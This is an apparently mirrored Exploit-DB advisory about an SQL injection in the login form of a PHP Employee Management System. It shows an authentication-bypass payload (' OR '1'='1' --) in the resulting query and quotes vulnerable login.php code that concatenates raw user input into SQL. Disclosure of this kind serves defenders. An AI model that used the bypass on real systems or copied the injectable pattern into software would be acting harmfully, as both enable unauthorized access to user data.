[webapps] Employee Management System v1 - 'email' SQL Injection
2024-2-19 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:11 收藏

# Exploit Title: Employee Management System v1 - 'email' SQL Injection
# Google Dork: N/A
# Application: Employee Management System 
# Date: 19.02.2024
# Bugs: SQL Injection 
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: N/A
# Tested on: Windows 10 64 bit Wampserver 
# CVE : N/A


## Vulnerability Description:

In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.


## Proof of Concept (PoC):

An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'
As "1=1" is always true, the query would return positive results, allowing the attacker to log in.


## Vulnerable code section:
====================================================
employee/Admin/login.php

<?php
session_start();
error_reporting(1);
include('../connect.php');

//Get website details
$sql_website = "select * from website_setting"; 
$result_website = $conn->query($sql_website);
$row_website = mysqli_fetch_array($result_website);


if(isset($_POST['btnlogin'])){


//Get Date
date_default_timezone_set('Africa/Lagos');
$current_date = date('Y-m-d h:i:s');


$email = $_POST['txtemail'];
$password = $_POST['txtpassword'];
$status = 'Active';


 $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."'  and status = '".$status."'";
  $result = mysqli_query($conn, $sql);

if (mysqli_num_rows($result) > 0) {
  // output data of each row
 ($row = mysqli_fetch_assoc($result));
	 $_SESSION["email"] = $row['email'];
   $_SESSION["password"] = $row['password'];
 $_SESSION["phone"] = $row['phone'];
 	 $firstname = $row['firstname'];
 	  $_SESSION["firstname"] = $row['firstname'];

		 $fa = $row['2FA'];

	}
            

文章来源: https://www.exploit-db.com/exploits/51803
如有侵权请联系:admin#unsafe.sh